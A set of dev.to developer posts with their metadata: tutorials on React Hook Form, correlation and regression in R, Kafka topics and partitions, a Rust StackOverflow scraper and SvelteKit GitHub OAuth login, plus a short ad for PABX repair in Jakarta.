But what does `Controller` mean?
It is a wrapper component from React Hook Form that makes it easier for you to work with third-party libraries.
Now we can use this select in our main component like this:
```javascript
const genderOptions = [
{ value: "male", label: "Male" },
{ value: "female", label: "Female" },
];
```
```javascript
<InputSelect
control={control}
options={genderOptions}
placeholder="Gender"
asterick={true}
label="Gender"
name="gender"
controls={register("gender", {
required: true,
})}
errorMsg={
errors?.gender?.type === "required" &&
"gender is required"
}
/>
```
Stay tuned for the next article to complete our journey in React Hook Form,
and don't forget your feedback.
| maimohamed |
739,630 | correlation and Regression using R programming | How do I calculate correlation using R programming?? To calculate correlation between two... | 0 | 2021-06-26T00:32:25 | https://dev.to/maxwizard01/correlation-and-regression-using-r-programming-50ea | tutorial, datascience, newbie, devops | ## How do I calculate correlation using R programming??
To calculate correlation between two data sets is quite easy all you need is to make use of cor() function and insert the parameters `x`and `y`.
### Example1
What is the correlation between X and Y if y = (100,94,150,160,180), and x = (23,21,32,40,45).
### Solution
#### Codes>>
```R
y=c(100,94,150,160,180)
x =c(23,21,32,40,45)
cor(x,y)
```
#### Result>>
```
> y=c(100,94,150,160,180)
> x =c(23,21,32,40,45)
> cor(x,y)
[1] 0.978522
```
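For the curious, `cor()` computes the Pearson correlation coefficient by default:
```
r = Σ(xᵢ - x̄)(yᵢ - ȳ) / sqrt( Σ(xᵢ - x̄)² × Σ(yᵢ - ȳ)² )
```
where x̄ and ȳ are the means of x and y. The value of r always lies between -1 and 1; a value close to 1, like 0.9785 here, indicates a strong positive linear relationship.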
### Example2
What is the correlation between X and Y if y =(100,94,150,160,180,80), and x = (23,21,32,40,45, 10).
### Solution
#### Codes>>
```R
y=c(100,94,150,160,180,80)
x =c(23,21,32,40,45, 10)
cor(x,y)
```
#### Result>>
```
> y=c(100,94,150,160,180,80)
> x =c(23,21,32,40,45, 10)
> cor(x,y)
[1] 0.972529
```
### How to calculate the regression
To deal with regression there are two very important values: the beta and the alpha. They are used to form the equation that connects the two items,
i.e. y = bx + a, where a and b represent the alpha and beta respectively.
Note: alpha is the intercept while b is the slope.
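Behind the scenes, `lm()` obtains these two values with the ordinary least-squares formulas:
```
b (slope)     = Σ(xᵢ - x̄)(yᵢ - ȳ) / Σ(xᵢ - x̄)²
a (intercept) = ȳ - b × x̄
```
where x̄ and ȳ are the means of x and y.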
### How do I calculate the beta and alpha of a regression using R programming?
To calculate your alpha and beta using code, we make use of the `lm()` function,
where the parameters are placed inside the lm() function. Let's take a look at some examples.
#### Example1
If x = [23,21,32,40,45, 10] and y = [100,94,150,160,180,80]. Obtain the linear model of the relationship between y and x.
#### Solution
#### Codes>>
```R
y=c(100,94,150,160,180,80)
x =c(23,21,32,40,45, 10)
lm(y ~ x)
```
#### Result>>
```
> y=c(100,94,150,160,180,80)
> x =c(23,21,32,40,45, 10)
> lm(y ~ x)
Call:
lm(formula = y ~ x)
Coefficients:
(Intercept) x
39.693 3.075
```
*Conclusion*: from the result above, alpha = 39.693 while beta = 3.075,
and the equation is Y = 3.075x + 39.693.
#### Example2
If x = [23,21,32,40,45] and y = [100,94,150,160,180]. Obtain the linear model of the relationship between y and x.
#### Solution
##### Codes>>
```R
y=c(100,94,150,160,180)
x =c(23,21,32,40,45)
lm(y ~ x)
```
##### Result>>
```
> y=c(100,94,150,160,180)
> x =c(23,21,32,40,45)
> lm(y ~ x)
Call:
lm(formula = y ~ x)
Coefficients:
(Intercept) x
22.071 3.563
```
Conclusion: from the result above, alpha = 22.071 while beta = 3.563,
and the equation is Y = 3.563x + 22.071.
#### Example3
If x = [23,21,32,40,45, 10] and y = [100,94,150,160,180,80], what would be the value of y if x = 20?
#### Solution.
Note that we already wrote the code for this item in Example 1, and our equation is Y = 3.075x + 39.693. So let's find the value of y when x = 20.
##### Codes>>
```R
x=20
Y=3.075*x+39.693
print(Y)
```
#### Result>>
```
> x=20
> Y=3.075*x+39.693
> print(Y)
[1] 101.193
```
### Example4
If x = [23,21,32,40,45, 10] and y = [100,94,150,160,180,80]. What would be the value of x if y = 200
#### Solution.
Note the we already write codes for this item in Example1. and our equation is Y=3.075x+39.693. since we need to find x when y=200 therefore we have to make x the subject of the formula.
Working that out we get x=(Y-39.693)/3.075. Now let's write the codes.
#### Codes>>
```R
Y=200
x=(Y-39.693)/3.075
print(x)
```
#### Result>>>
```
> Y=200
> x=(Y-39.693)/3.075
> print(x)
[1] 52.13236
```
Yeah, that is how easy it is to use code to solve most problems relating to correlation and regression. I hope you found this article helpful. Alright, you can chat me up if you have any doubt or observation on `07045225718` or `09153036869`. It is still your guy Maxwizard. Enjoy coding! | maxwizard01 |
739,705 | Notes on Kafka: Topics, Partitions, and Offset | In the previous section, we have installed the Kafka and all the required pre-requisites in our... | 13,252 | 2021-06-26T00:59:41 | https://dev.to/jeden/notes-on-kafka-topics-partitions-and-offset-3fgg | kafka, microservices, devops, 100daysofcode | In the previous section, we installed Kafka and all the required prerequisites on our machine. You can skip any parts of this section that you're already familiar with, but basically we'll be going over:
- [Brief walkthrough of the directories](#brief-walkthrough-of-the-directories)
- [Now, onto the main topic](#now-onto-the-main-topic)
- [What's in a message?](#whats-in-a-message)
- [Event Sourcing](#event-sourcing)
- [Partitions](#partitions)
- [The Message Offset](#the-message-offset)
- [The Message Retention Policy](#the-message-retention-policy)
- [As a Distributed Commit Log](#as-a-distributed-commit-log)
---
## Brief walkthrough of the directories
Recall that we've created the Kafka files directory in <code>/usr/local/bin</code> and copied the extracted contents of the Kafka tarball we downloaded. Note that the Kafka files directory, and the Kafka program itself, can be run from any directory you prefer.
```bash
root:kafka_2.13-2.7.0 $ ls -l
total 56
drwxr-xr-x 3 root root 4096 Dec 16 2020 bin
drwxr-xr-x 2 root root 4096 Jun 23 15:05 config
drwxr-xr-x 4 root root 36 Jun 23 15:05 data
drwxr-xr-x 2 root root 8192 Jun 23 15:05 libs
-rw-r--r-- 1 root root 29975 Dec 16 2020 LICENSE
-rw-r--r-- 1 root root 337 Dec 16 2020 NOTICE
drwxr-xr-x 2 root root 44 Dec 16 2020 site-docs
```
The **site-docs** contains an archive of all the documentation that's available online.
The **libs** folder contains the dependencies needed by Kafka to run.
You'll notice in the bottom section that there are archives for **zookeeper** and its client library. Kafka can be a self-contained installation and does not require ZooKeeper to be pre-installed.
```bash
# Please note that some of the contents are omitted to shorten output
root:kafka_2.13-2.7.0 $ ls -l libs/
total 67052
-rw-r--r-- 1 root root 69409 May 28 2020 activation-1.1.1.jar
-rw-r--r-- 1 root root 27006 Jun 30 2020 aopalliance-repackaged-2.6.1.jar
-rw-r--r-- 1 root root 90347 May 28 2020 argparse4j-0.7.0.jar
-rw-r--r-- 1 root root 20437 Dec 20 2019 audience-annotations-0.5.0.jar
-rw-r--r-- 1 root root 53820 Dec 20 2019 commons-cli-1.4.jar
-rw-r--r-- 1 root root 501879 May 28 2020 commons-lang3-3.8.1.jar
-rw-r--r-- 1 root root 12211 Jan 22 2020 slf4j-log4j12-1.7.30.jar
-rw-r--r-- 1 root root 1945847 Oct 21 2020 snappy-java-1.1.7.7.jar
-rw-r--r-- 1 root root 991098 May 27 2020 zookeeper-3.5.8.jar
-rw-r--r-- 1 root root 250547 May 27 2020 zookeeper-jute-3.5.8.jar
-rw-r--r-- 1 root root 5355050 Aug 12 2020 zstd-jni-1.4.5-6.jar
```
The **config** contains all the configuration files for Kafka. Here you can see **server.properties**. This is the configuration file for the Kafka broker.
```bash
root:kafka_2.13-2.7.0 $ ll config/
total 72
-rw-r--r-- 1 root root 906 Dec 16 2020 connect-console-sink.properties
-rw-r--r-- 1 root root 909 Dec 16 2020 connect-console-source.properties
-rw-r--r-- 1 root root 5321 Dec 16 2020 connect-distributed.properties
-rw-r--r-- 1 root root 883 Dec 16 2020 connect-file-sink.properties
-rw-r--r-- 1 root root 881 Dec 16 2020 connect-file-source.properties
-rw-r--r-- 1 root root 2247 Dec 16 2020 connect-log4j.properties
-rw-r--r-- 1 root root 2540 Dec 16 2020 connect-mirror-maker.properties
-rw-r--r-- 1 root root 2262 Dec 16 2020 connect-standalone.properties
-rw-r--r-- 1 root root 1221 Dec 16 2020 consumer.properties
-rw-r--r-- 1 root root 4674 Dec 16 2020 log4j.properties
-rw-r--r-- 1 root root 1925 Dec 16 2020 producer.properties
-rw-r--r-- 1 root root 6876 Jun 23 15:05 server.properties
-rw-r--r-- 1 root root 1032 Dec 16 2020 tools-log4j.properties
-rw-r--r-- 1 root root 1169 Dec 16 2020 trogdor.conf
-rw-r--r-- 1 root root 1237 Jun 23 15:05 zookeeper.properties
```
Lastly, the **bin** directory contains all the programs you can execute to get Kafka up and running.
```bash
# Please note that some of the contents are omitted to shorten output
root:kafka_2.13-2.7.0 $ ll bin/
total 144
-rwxr-xr-x 1 root root 1423 Dec 16 2020 connect-distributed.sh
-rwxr-xr-x 1 root root 1396 Dec 16 2020 connect-mirror-maker.sh
-rwxr-xr-x 1 root root 1420 Dec 16 2020 connect-standalone.sh
-rwxr-xr-x 1 root root 861 Dec 16 2020 kafka-acls.sh
-rwxr-xr-x 1 root root 958 Dec 16 2020 kafka-verifiable-producer.sh
-rwxr-xr-x 1 root root 1714 Dec 16 2020 trogdor.sh
drwxr-xr-x 2 root root 4096 Dec 16 2020 windows
-rwxr-xr-x 1 root root 867 Dec 16 2020 zookeeper-security-migration.sh
-rwxr-xr-x 1 root root 1393 Dec 16 2020 zookeeper-server-start.sh
-rwxr-xr-x 1 root root 1366 Dec 16 2020 zookeeper-server-stop.sh
-rwxr-xr-x 1 root root 1019 Dec 16 2020 zookeeper-shell.sh
```
---------
## Now, onto the main "Topic"

**Topics** are simply logical collections of messages that can virtually span across the entire cluster.
- it is a named feed - addressable and can be referenced
- Producers send messages to a topic
- Consumers retrieve messages from a topic
- you can have as many topics as you want
- topics are split into **partitions**
Producers and consumers don't really care how or where the messages are kept. On the Kafka cluster's side, one or more log files are maintained for each topic.
---------
## What's in a message?

Every Kafka message will have:
- **a timestamp** - set when the message is received by the broker
- **unique identifier** - a way for consumers to reference the message
- **binary payload** - data
Recall that Kafka was conceived to resolve the issue of making consumption available to a theoretically unlimited number of independent and autonomous consumers. This means that there could be not just one consumer but hundreds or thousands of consumers that would like to receive the same messages.
Now why is this important to know? If one consumer processed a message erroneously, that fault should not cascade or impact other consumers that are processing the same message.
A single crash in one consumer shouldn't keep others from operating. Each must have its own exclusive boundary.
---
## Event Sourcing
When a producer sends a message to a topic, the messages are **appended in a time-ordered sequential stream.**
- Each message represents an **event** or **Fact**
- Events are intended by the producers to be consumed by the consumers
- Events are also **immutable** - they can't be modified once received by the topic
- If an event in the topic is **no longer valid**, the producer should follow it up with a newer, correct one
- The consumer would have to reconcile messages when processed

This architectural style of maintaining an application's state through the changes captured in an immutable, time-ordered sequence is called **Event Sourcing**.
---------
## Partitions

As mentioned, topics can have 1 or more partitions
- number of partitions is configurable
- each partition is ordered
- each message in a partition gets an incremental id called an **offset**
- the order of messages is only guaranteed within a partition, not across partitions
- essential for scalability and fault-tolerance
**Do I need to specify a partition when I create a topic?**
Yes, we need to specify the number of partitions when we create a topic, but this can be changed at any time.
**Should I use a single partition or multiple partitions?**
A single-partition topic can be used even for production, but this limits scalability and throughput. This is because you cannot simply split a single partition across multiple machines. A single partition may not be able to sustain a growing topic.
**For multiple partitions, can I select the partition where the message will go to?**
Data is randomly assigned to a partition unless a key is specified. This will be discussed in the succeeding chapters.

---------
## The Message Offset
The message offset enables consumers to read their messages at their own pace and process them independently. Similar to a bookmark, it:
- serves as a message identifier
- maintains last read message position
- tracked and maintained by Consumer
At the beginning, a consumer will establish a connection to a broker. The consumer will then decide what messages it wants to consume. There could be two instances here:
- the consumer has not read any message from the topic yet
- the consumer has read from topic but wants to re-read a message
In both cases, the consumer will read from the beginning. It will then set its message offset to zero, indicating it's at the start. As it reads through the sequence of messages, it will also move its message offset.

Let's say we have another consumer that is also reading the messages and is at a different place in the topic. It can choose to stay in that place, reread the messages from the start, or proceed with the remaining messages.
When newer messages arrive at the topic, the connected consumers will receive an event indicating the published messages, and both consumers can decide to retrieve and process the new messages.

The idea here is, **the consumer knows where it is currently at and it can choose to start over or advance its position, without the need to inform the brokers, producers or other consumers.**
Another thing to note here is that **the offset is specific to each partition**. This means that offset 3 in partition 0 will not hold the same data as offset 3 in partition 1.
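A tiny sketch of this idea in JavaScript (illustration only; real consumers poll brokers rather than index into an in-memory array): each consumer keeps its own per-partition offset, and reading never mutates the log.

```javascript
// Each consumer tracks its own read position per partition; the log itself
// is never changed by reads.
class Consumer {
  constructor() {
    this.offsets = {} // partition -> next offset to read
  }
  poll(log, partition) {
    const pos = this.offsets[partition] || 0
    const msg = log[partition][pos]
    if (msg !== undefined) this.offsets[partition] = pos + 1
    return msg
  }
}

const log = { 0: ['m0', 'm1', 'm2'] } // one partition holding three messages
const a = new Consumer()
const b = new Consumer()
a.poll(log, 0)
a.poll(log, 0) // consumer A has read two messages
b.poll(log, 0) // consumer B has independently read one
```

Consumer B can later resume from its own offset, or reset it to zero to re-read, without affecting A.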
---
## The Message Retention Policy

One of the challenges that most messaging systems face is **slow consumers**. The problem with slow consumers is that the queue can get long and some messages might get lost.
Kafka's solution to this is its **message retention policy.** This allows Kafka to store the messages for a configurable period of time (hours).
- published messages are retained regardless of whether they've been consumed or not
- **default retention time:** 168 hours or 7 days
- after that time has passed, messages will be removed
- the cluster will start removing the oldest messages
- retention period is set **per-topic**
- message retention may be **constrained** by physical storage
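As a sketch, the broker-wide defaults live in config/server.properties. The two keys below are standard broker settings (per-topic overrides are applied separately through the topic tooling):

```properties
# Keep messages for 7 days (168 hours) by default
log.retention.hours=168
# No size-based limit unless one is set; -1 disables it
log.retention.bytes=-1
```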
-----
## As a Distributed Commit Log

Before we conclude this section about topics and partitions, we'll look at what Kafka based its architecture on: **commit logs**. A database's transaction or commit log is:
- **source of truth** - a primary record of changes
- appends events in the order they're received
- logs are then read from left to right - in a chronological order
- log entries are stored in physical log files and maintained by database
- higher-order derivative structures can be formed to represent the log
- tables, indexes, views (relational databases)
- serves as **point-in-time recovery** during crashes
- basis for **replication** and **distribution**
In summary, Kafka can be thought of as an external commit log for a distributed system, one that uses publish-subscribe semantics for brokers to read and write.
---------
If you've enjoyed this short but concise article, I'll be glad to connect with you on [Twitter!](https://twitter.com/eden_noel08). 😃
{% user jeden %}
---------------------------------
| jeden |
739,771 | Technician Pabx Jakarta | PABX Service – PABX service technicians provide PABX maintenance and repair services, to... | 0 | 2021-06-26T04:44:07 | https://dev.to/jono76/technician-pabx-jakarta-492f |
PABX Service – PABX service technicians provide PABX maintenance and repair services, to monitor the health of your PABX and to prevent a possible total failure. Maintenance is needed to give customers peace of mind, because the PABX or telephone system then works at its best. This is very helpful when communicating with clients.
PABX Service Technicians
PABX service technicians are tasked with keeping the telecommunication system easy to use for contacting business clients at your company, as well as monitoring system status, logging all important events, and promptly visiting your business premises or home. Our on-call PABX service technicians are available 24 hours a day, 7 days a week to make sure these problems are resolved and your business telephone system is ready for your business.
PABX Service Coverage Area
The PABX service coverage area is around Jabotabek, such as South Jakarta, Central Jakarta, East Jakarta, West Jakarta, North Jakarta, Bekasi, Bogor, Karawang, Tangerang, and other regions of Indonesia.
Our PABX technician services include:
Other PABX services are: PABX Sales, PABX Buying and Selling, PABX Repair, PABX Repair Services, PABX Setup, PABX Setup Services, PABX Programming, PABX Programming Services, PABX Relocation, PABX Relocation Services, PABX Trade-In, PABX Mounting, PABX Mounting Services, PABX Installation, PABX Installation Services, PABX Dismantling and Reinstallation, PABX Dismantling and Reinstallation Services, Telephone Cable Pulling Services, Telephone Cable Pulling.
Source : https://www.teknisiservicepabx.com/service-pabx/ | jono76 |
739,866 | Stackoverflow scraping with rust | It will extract the title, question link, answers count, view count, and votes from StackOverflow... | 0 | 2021-06-26T07:12:00 | https://dev.to/chaudharypraveen98/stackoverflow-scraping-with-rust-4624 | rust, scraping, cli, selectrs | It will extract the title, question link, answers count, view count, and votes from StackOverflow depending on the tag parameter and count. This scraper is inspired by [Kadekillary Scraper](https://github.com/kadekillary/scraping-with-rust) with updated libraries and some more features added.
#### Libraries Used
* [Reqwest](https://crates.io/crates/reqwest)
>An ergonomic, batteries-included HTTP Client for Rust.
* [Select](https://crates.io/crates/select)
>A Rust library to extract useful data from HTML documents, suitable for web scraping
* [Clap](https://crates.io/crates/clap)
>A simple-to-use, efficient, and full-featured library for parsing command line arguments and subcommands.
#### Features
* Simple and Fast
* Async get request
* Cli mode
#### How to run
1. Build the executable by `cargo build`
2. Run by `./target/debug/stackoverflow-scraping-with-rust -t <tag> -c <count>`<br>
**< tag >** is the topic from which you want to scrape<br>
**< count >** is the number of posts/threads to be scraped. Note that the maximum limit is *16*<br>
Like this:
`./target/debug/stackoverflow-scraping-with-rust -t java -c 1`
**What are we going to do?**
<ol>
<li>Getting argument from the command line using Clap library</li>
<li>Make a request using the Reqwest library</li>
<li>Scraping using the Selectrs library</li>
</ol>
**Installing Libraries**
<b>Simple add the following libraries in Cargo.toml</b>
```
[dependencies]
reqwest = { version = "0.10", features = ["json"] }
tokio = { version = "0.2", features = ["full"] }
select = "0.6.0-alpha.1"
clap = "2.33.3"
rand = "0.8.4"
```
**Before moving ahead, we must be aware of CSS selectors**
**What are selectors/locators?**
A <b>CSS Selector</b> is a combination of an element selector and a value that identifies the web element within a web page.
<b>The choice of locator depends largely on your Application Under Test</b>
<b>Id</b>
An element’s id in XPath is defined using “[@id='example']” and in CSS using “#”. IDs must be unique within the DOM.
Examples:
```
XPath: //div[@id='example']
CSS: #example
```
<b>Element Type</b>
The previous example showed //div in the XPath. That is the element type, which could be input for a text box or button, img for an image, or "a" for a link.
```
XPath: //input
CSS: input
```
<b>Direct Child</b>
HTML pages are structured like XML, with children nested inside of parents. If you can locate, for example, the first link within a div, you can construct a string to reach it. A direct child in XPATH is defined by the use of a “/“, while on CSS, it’s defined using “>”.
Examples:
```
XPath: //div/a
CSS: div > a
```
<b>Child or Sub-Child</b>
Writing nested divs can get tiring - and result in code that is brittle. Sometimes you expect the code to change, or want to skip layers. If an element could be inside another or one of its children, it’s defined in XPATH using “//” and in CSS just by whitespace.
Examples:
```
XPath: //div//a
CSS: div a
```
<b>Class</b>
For classes, things are pretty similar in XPATH: “[@class='example']” while in CSS it’s just “.”
Examples:
```
XPath: //div[@class='example']
CSS: .example
```
## Step 1 -> Getting argument from the command line using Clap library
We are using the Clap library to get the arguments from the command line.
There are three cases:
<ol>
<li><b>Only tag is provided</b> => We will get posts for the input tag with the default number of posts, i.e. 16</li>
<li><b>Only count is provided</b> => We will get the input number of posts from a random topic chosen using the Rand library</li>
<li><b>Both count and tag</b> => We will get the input number of posts for the input tag</li>
</ol>
First, we initialize the command line app named StackOverflow Scraper. Then we declare the two arguments with their short and long names.
```
fn main() {
let matches = App::new("StackOverflow Scraper")
.version("1.0")
.author("Praveen Chaudhary <chaudharypraveen98@gmail.com>")
.about("It will scrape questions from StackOverflow depending on the tag.")
.arg(
Arg::with_name("tag")
.short("t")
.long("tag")
.takes_value(true)
.help("takes the tag and scrape according to this"),
)
.arg(
Arg::with_name("count")
.short("c")
.long("count")
.takes_value(true)
.help("gives n count of posts"),
)
.get_matches();
....
....
```
Once we have defined the arguments, we need to extract their values. Using the `matches` object we can check which arguments are present and handle each case.
```
fn main() {
.....
.....
if matches.is_present("tag") && matches.is_present("count") {
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
matches.value_of("tag").unwrap()
);
let count: i32 = matches.value_of("count").unwrap().parse::<i32>().unwrap();
stackoverflow_post(&url, count as usize);
} else if matches.is_present("tag") {
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
matches.value_of("tag").unwrap()
);
stackoverflow_post(&url, 16);
} else if matches.is_present("count") {
let url = get_random_url();
let count: i32 = matches.value_of("count").unwrap().parse::<i32>().unwrap();
stackoverflow_post(&url, count as usize);
} else {
let url = get_random_url();
stackoverflow_post(&url, 16);
}
}
```
In the above code, we have used the <tt>stackoverflow_post</tt> function (it appears as <tt>hacker_news</tt> in the complete code below). We will learn about this in <b>Step 3</b>.
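Under the hood, clap is automating roughly this kind of flag handling. A hand-rolled, std-only sketch (a hypothetical helper, just to show what the library saves us from writing):

```rust
use std::env;

// Hypothetical helper: manually scan the argument list for the -t/--tag
// and -c/--count flags that our clap app declares.
fn parse_args(args: &[String]) -> (Option<String>, Option<u32>) {
    let mut tag = None;
    let mut count = None;
    let mut i = 0;
    while i < args.len() {
        match args[i].as_str() {
            "-t" | "--tag" if i + 1 < args.len() => {
                tag = Some(args[i + 1].clone());
                i += 2;
            }
            "-c" | "--count" if i + 1 < args.len() => {
                count = args[i + 1].parse().ok();
                i += 2;
            }
            _ => i += 1,
        }
    }
    (tag, count)
}

fn main() {
    let args: Vec<String> = env::args().skip(1).collect();
    let (tag, count) = parse_args(&args);
    println!("tag = {:?}, count = {:?}", tag, count);
}
```

clap adds help text, validation, and error messages on top of this for free.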
## Step 2 -> Make a request using the Reqwest library
We will use the reqwest library to make a GET request to the StackOverflow website, customized with the input tag.
```
#[tokio::main]
async fn hacker_news(url: &str, count: usize) -> Result<(), reqwest::Error> {
let resp = reqwest::get(url).await?;
....
```
## Step 3 -> Scraping using the Selectrs library
We will use CSS selectors to get the question posts from StackOverflow.
```
#[tokio::main]
async fn hacker_news(url: &str, count: usize) -> Result<(), reqwest::Error> {
.....
.....
let document = Document::from(&*resp.text().await?);
for node in document.select(Class("s-post-summary")).take(count) {
let question = node
.select(Class("s-post-summary--content-excerpt"))
.next()
.unwrap()
.text();
let title_element = node
.select(Class("s-post-summary--content-title").child(Name("a")))
.next()
.unwrap();
let title = title_element.text();
let question_link = title_element.attr("href").unwrap();
let stats = node
.select(Class("s-post-summary--stats-item-number"))
.map(|stat| stat.text())
.collect::<Vec<_>>();
let votes = &stats[0];
let answer = &stats[1];
let views = &stats[2];
let tags = node
.select(Class("post-tag"))
.map(|tag| tag.text())
.collect::<Vec<_>>();
println!("Question => {}", question);
println!(
"Question-link => https://stackoverflow.com{}",
question_link
);
println!("Question-title => {}", title);
println!("Votes => {}", votes);
println!("Views => {}", views);
println!("Tags => {}", tags.join(" ,"));
println!("Answers => {}", answer);
println!("-------------------------------------------------------------\n");
}
Ok(())
}
```
## Complete Code
```
extern crate clap;
extern crate reqwest;
extern crate select;
extern crate tokio;
use clap::{App, Arg};
use rand::seq::SliceRandom;
use select::document::Document;
use select::predicate::{Attr, Class, Name, Or, Predicate};
fn main() {
let matches = App::new("StackOverflow Scraper")
.version("1.0")
.author("Praveen Chaudhary <chaudharypraveen98@gmail.com>")
.about("It will scrape questions from stackoverflow depending on the tag.")
.arg(
Arg::with_name("tag")
.short("t")
.long("tag")
.takes_value(true)
.help("takes the tag and scrape according to this"),
)
.arg(
Arg::with_name("count")
.short("c")
.long("count")
.takes_value(true)
.help("gives n count of posts"),
)
.get_matches();
if matches.is_present("tag") && matches.is_present("count") {
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
matches.value_of("tag").unwrap()
);
let count: i32 = matches.value_of("count").unwrap().parse::<i32>().unwrap();
hacker_news(&url, count as usize);
} else if matches.is_present("tag") {
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
matches.value_of("tag").unwrap()
);
hacker_news(&url, 16);
} else if matches.is_present("count") {
let url = get_random_url();
let count: i32 = matches.value_of("count").unwrap().parse::<i32>().unwrap();
hacker_news(&url, count as usize);
} else {
let url = get_random_url();
hacker_news(&url, 16);
}
}
#[tokio::main]
async fn hacker_news(url: &str, count: usize) -> Result<(), reqwest::Error> {
let resp = reqwest::get(url).await?;
// println!("body = {:?}", resp.text().await?);
// assert!(resp.status().is_success());
let document = Document::from(&*resp.text().await?);
for node in document.select(Class("s-post-summary")).take(count) {
let question = node
.select(Class("s-post-summary--content-excerpt"))
.next()
.unwrap()
.text();
let title_element = node
.select(Class("s-post-summary--content-title").child(Name("a")))
.next()
.unwrap();
let title = title_element.text();
let question_link = title_element.attr("href").unwrap();
let stats = node
.select(Class("s-post-summary--stats-item-number"))
.map(|stat| stat.text())
.collect::<Vec<_>>();
let votes = &stats[0];
let answer = &stats[1];
let views = &stats[2];
let tags = node
.select(Class("post-tag"))
.map(|tag| tag.text())
.collect::<Vec<_>>();
println!("Question => {}", question);
println!(
"Question-link => https://stackoverflow.com{}",
question_link
);
println!("Question-title => {}", title);
println!("Votes => {}", votes);
println!("Views => {}", views);
println!("Tags => {}", tags.join(" ,"));
println!("Answers => {}", answer);
println!("-------------------------------------------------------------\n");
}
Ok(())
}
// Getting random tag
fn get_random_url() -> String {
let default_tags = vec!["python", "rust", "c#", "android", "html", "javascript"];
let random_tag = default_tags.choose(&mut rand::thread_rng()).unwrap();
let url = format!(
"https://stackoverflow.com/questions/tagged/{}?tab=Votes",
random_tag
);
url.to_string()
}
```
## How to run our scraper?
<ol>
<li>Build the executable by <code>cargo build</code></li>
<li>Run by <code>./target/debug/stackoverflow-scraping-with-rust -t <tag> -c <count></code>, where < tag > is the topic from which you want to scrape and < count > is the number of posts/threads to be scraped (note that the maximum limit is 16). For example: <code>./target/debug/stackoverflow-scraping-with-rust -t java -c 1</code></li>
</ol>
## Deployment
You can deploy on <a href="https://www.heroku.com/">Heroku</a> with the help of <a href="https://circleci.com/">Circle CI</a>
You can read more about on <a href="https://circleci.com/blog/rust-cd/">CircleCI Blog</a>
## Web Preview / Output

<a href="https://drive.google.com/file/d/1SjQ0U1JZF6nn74PgpHDnurwvjEGGl-VH/preview">Google Drive</a>
**Github Link** = > https://github.com/chaudharypraveen98/stackoverflow-scraping-with-rust
| chaudharypraveen98 |
740,082 | Sveltekit Authentication | 🎓Tutorial: What you will learn * How to create an OAuth Application using Github * How to... | 0 | 2021-07-03T11:56:52 | https://hyper-io.medium.com/sveltekit-authentication-3363e086e72c | javascript, authentication, svelte, tutorial | ---
title: Sveltekit Authentication
published: true
date: 2021-06-02 20:50:07 UTC
tags: javascript,authentication,svelte,tutorial
canonical_url: https://hyper-io.medium.com/sveltekit-authentication-3363e086e72c
---
> 🎓Tutorial: What you will learn
>
> \* How to create an OAuth Application using Github
> \* How to redirect requests using SvelteKit
> \* How to handle OAuth Callbacks
> \* How to use the Access Token to get Github User Information
> \* How to store http-only secure cookies using SvelteKit
> \* How to use the hooks middleware in SvelteKit
> \* How to read session information in the SvelteKit client
SvelteKit is the new way to build svelte applications. SvelteKit gives you the ability to run your application on the server and client. With this new approach you have the option to leverage http-only (server-side) cookies to manage authentication state. In this post, we will walk through the process of setting up OAuth authentication using Github and SvelteKit.
#### Prerequisites
What do I need to know for this tutorial?
- Javascript — [https://developer.mozilla.org/en-US/docs/Web/JavaScript](https://developer.mozilla.org/en-US/docs/Web/JavaScript)
- Fetch API — [https://developer.mozilla.org/en-US/docs/Web/API/Fetch\_API/Using\_Fetch](https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch)
- NodeJS v14+ — [https://nodejs.org/](https://nodejs.org/en/)
- A Github Account
{% youtube D4ZcbudB1n0 %}
#### Getting Started
Ready, set, go! SvelteKit provides a command-line application that we can use to spin up a new project. The CLI will ask us a bunch of questions, so let's step through them. In your terminal, create a new folder for this project. Let's call the project authy, or any name you prefer:
```
mkdir authy
cd authy
```
Use the npm init function to create the SvelteKit project
```
npm init svelte@next
```
Let’s go through the questions:
```
create-svelte version 2.0.0-next.73
Welcome to SvelteKit!
This is beta software; expect bugs and missing features.
If you encounter a problem, open an issue on https://github.com/sveltejs/kit/issues if none exists already.
? Directory not empty. Continue? › (y/N) y
? Which Svelte app template? › - Use arrow-keys. Return to submit.
[Choose Skeleton project]
? Use TypeScript? › No / Yes -> No
? Add ESLint for code linting? › No / Yes -> No
? Add Prettier for code formatting? › No / Yes -> No
```
✨ Yay! We just set up SvelteKit
#### Create Github OAuth Application
Go to [https://github.com/settings/applications/new](https://github.com/settings/applications/new) in your browser and create a new application called authy with a homepage of http://localhost:3000 and a callback url of [http://localhost:3000/callback](http://localhost:3000/callback)

Click Register application
You will be redirected to a page that looks similar to this:

In your project directory, create a .env file. Take the client id from the Github page and add it to the .env file as VITE\_CLIENT\_ID, then click Generate a new client secret, copy the secret, and add it to the .env file as VITE\_CLIENT\_SECRET
```
VITE_CLIENT_ID=XXXXXXX
VITE_CLIENT_SECRET=XXXXXXXXXX
```
Save and close your .env file
🎉 You have created a Github OAuth application! Now we can wire the OAuth application into our project to create a secure workflow.
#### Setup the login button
To set up the login, we will add a button to src/routes/index.svelte and then create a SvelteKit endpoint. This endpoint will perform a redirect to Github for authentication.
src/routes/index.svelte
```
<h1>Welcome to SvelteKit</h1>
<p>Visit <a href="https://kit.svelte.dev">kit.svelte.dev</a> to read the documentation</p>
<a href="/login">
<button>Login using Github</button>
</a>
```
#### Create the /login endpoint
SvelteKit leverages the file system not only to define page routes, but to define endpoints as well. In the routes folder, or any child folder of the routes folder, a file ending with the .svelte extension is a page, while a file ending with a .js extension is an endpoint. Using the exports feature of esm, you can map http verbs to javascript handlers. In our case, we want to create a src/routes/login.js file and map the GET http verb to the exported get function.
```
export async function get(req) {
return {
body: 'Hello'
}
}
```
With the get handler on src/routes/login.js defined, it will take a Request object as input and return a Response object as output. Each of these object types are defined as part of the fetch specification:
- [Request](https://fetch.spec.whatwg.org/#request-class)
- [Response](https://fetch.spec.whatwg.org/#response-class)
In the SvelteKit documentation you can see them defined as typescript types:
[SvelteKit docs](https://kit.svelte.dev/docs#routing-endpoints)
```
type Headers = Record<string, string>;
type Request<Locals = Record<string, any>, Body = unknown> = {
method: string;
host: string;
headers: Headers;
path: string;
params: Record<string, string>;
query: URLSearchParams;
rawBody: string | Uint8Array;
body: ParameterizedBody<Body>;
locals: Locals; // populated by hooks handle
};
type EndpointOutput = {
